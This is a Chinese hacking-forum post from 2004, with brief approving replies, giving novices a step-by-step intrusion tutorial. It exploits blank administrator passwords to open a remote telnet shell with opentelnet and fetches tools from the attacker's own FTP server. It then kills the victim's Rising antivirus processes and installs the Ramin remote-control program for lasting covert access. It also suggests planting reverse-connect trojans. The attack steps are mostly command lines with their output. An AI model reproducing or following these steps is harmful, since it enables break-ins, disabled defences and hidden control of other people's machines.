|
 | 作者: cg2327 [cg2327]
 |
登录 |
| !!原创!!入侵3步曲1(新学网络安全的兄弟必看) 最近群里和论坛上来了一些新加入我们的兄弟,可能刚学习这个对基础还不是很了解,经常会问到寻找肉鸡和捕获肉鸡的方法 . 所以我在这里给新接触网络安全的朋友说一下对入侵的基本呢了解和认识以及一些技巧 现在有一些新朋友 对基础没有什么兴趣 呵呵 那些朋友下面的话就可以不看啦.在现在很多朋友看来只要开了3389就拥有了自己的肉鸡 , 其实不然 开3389只是一种形式,只能说明你可以用终端方式对其进行控制 ,但是不是可以长期的拥有他, 答案是肯定的不是 ,所以你只可以一段时间后在寻找新的肉鸡 .有没有方法可以长期控制肉鸡呢 "有" 就是提高技术去攻击服务器 ,呵呵 估计很少人有那个能力吧. 有那个技术的人也不会去攻击什么服务器啦 .所以我想大家还是先把基础的知识学好, 那样在未来的日子就有机会得到自己的长期肉鸡啦 .在下面我会讲一些用软件入侵带病毒防火墙而不带端口防火墙机器的方法 .什么NET命令, 不是不是 . 呵呵 说过用软件啦 嘎嘎 ~ 当然 ,举个常用漏洞 NET弱口令,他是由于管理员(都是些懒人)疏忽而造成的比较常见的漏洞.我们可以通过他进行我们下面的行动. "opentelnet"是个比较出名的端口重定向可以将一个shell连到一个端口上 "ps"是一个查看进程和结束进程的使用工具 "20cnftp"是个ftp服务器简单快捷对无可非议印象不好还帮他做广告谁让咱不会编呢 "Ramin"一个比较有名的远程控制软件 和3389一样 不用重起 不会被杀 嘎嘎 好了工具准备好了开始吧"这种方法对于新手就是让自己在对方机器所留下的日志可以少些 首先找到一台有空口令漏洞的主机 然后使用opentelnet c:>\opentelnet /? ******************************************************* Remote Telnet Configure, by refdom Email: refdom@263.net opentelnet Usage:OpenTelnet.exe \\server username password NTLMAuthor telnetport ******************************************************* c:\>opentelnet \\对方ip 已知用户 如果空就填"" ntlm 开的端口 c:\>opentelnet \\127.0.0.1 administrator "" 0 1207 我将127.0.0.1这个IP开了一个1207端口 后面可以telnet 上去啦 E:\>telnet 127.0.0.1 1207 正在连接到127.0.0.1.... user:添用户 password:添密码 正确登陆后显示如下 Microsoft Windows xxxxxxxxxxxxxx (C) 版权所有 1985-2001 Microsoft Corp. c:\>winnt\system32 下面就可以用轮到20cnftp和ps上场啦 先在自己机器上开20cnftp把ps放到ftp共享目录密码想设就设个别忘在防火墙开21端口 然后在他的shell里打上 c:\>winnt\system32\ftp 127.0.0.1 连接自己的ftp 127.0.0.1添你自己的 添用户 添密码 ftp>get ps.exe 把ps.exe从你机器传走 bye 退出ftp 接下来就运行传过来的ps.exe c:\winnt\system32\ps.exe 568 SYSTEM \SystemRoot\System32\smss.exe 656 SYSTEM \??\C:\WINnt\system32\winlogon.exe 700 SYSTEM C:\WINnt\system32\services.exe 712 SYSTEM C:\WINnt\system32\lsass.exe 884 SYSTEM C:\WINnt\system32\svchost.exe 1364 SYSTEM C:\WINnt\System32\svchost.exe 1864 SYSTEM C:\Program Files\rising\rav\Rav.exe 1016 SYSTEM C:\Program Files\rising\rav\CCenter.exe 1032 SYSTEM C:\Program Files\rising\rav\RavMonD.exe Kill Process: PS -k PID 现在瑞星比较多 基本的进程有3个Ravmond-Rav和Ccenter 直接杀掉 c:\>winnt\system32\ps -k 1864 c:\>winnt\system32\ps -k 1016 c:\>winnt\system32\ps -k 1032 在查一下 c:\winnt\system32\ps.exe 568 SYSTEM \SystemRoot\System32\smss.exe 656 SYSTEM \??\C:\WINnt\system32\winlogon.exe 700 SYSTEM C:\WINnt\system32\services.exe 712 SYSTEM C:\WINnt\system32\lsass.exe 884 SYSTEM C:\WINnt\system32\svchost.exe 1364 SYSTEM C:\WINnt\System32\svchost.exe 呵呵 没啦 现在你上传木马工具包他防火墙也管不到啦 c:\>winnt\system32\ftp 127.0.0.1 用户 密码 get Ramin.exe bye RAMIN可以进行远程图象监控 功能不在3389之下 由于是远程控制 所以不属于木马 不被查杀 安装后不需重起便可以直接操作 优点多多 嘎嘎 感谢hhcl老兄让我认识那么好的软件你也可以传一些 反弹木马之类的 呵呵 反正杀毒的被我们杀掉啦kill !! 尽情的享受用自己成果的来的肉鸡吧 嘎嘎 过些天我会发篇 "如何快速得到肉鸡"也是原创不过不像这个一样废话多多 保证大家学会后1分钟搞定一台肉鸡 而且是有目的性的 但是浏览是要有些论坛资本的 请大家在论坛多多发问吧 这是我第1次发原创 发的不好大家不要笑我 呵呵. |
| 地主 发表时间: 04-07-16 10:58 |
 | 回复: huawuya [huawuya]  论坛用户 |
登录 |
|
不错,够详细的。顶 |
| B1层 发表时间: 04-07-16 12:34 |
 | 回复: cindyxia [cindyxia] 论坛用户 |
登录 |
|
好东东,谢谢楼主,顶 |
| B2层 发表时间: 04-07-16 15:15 |
 | 回复: tianshupei [tianshupei] 论坛用户 |
登录 |
有防火墙没关系吧 |
| B3层 发表时间: 04-07-16 17:25 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 入侵3步曲(转:www.kker.cn)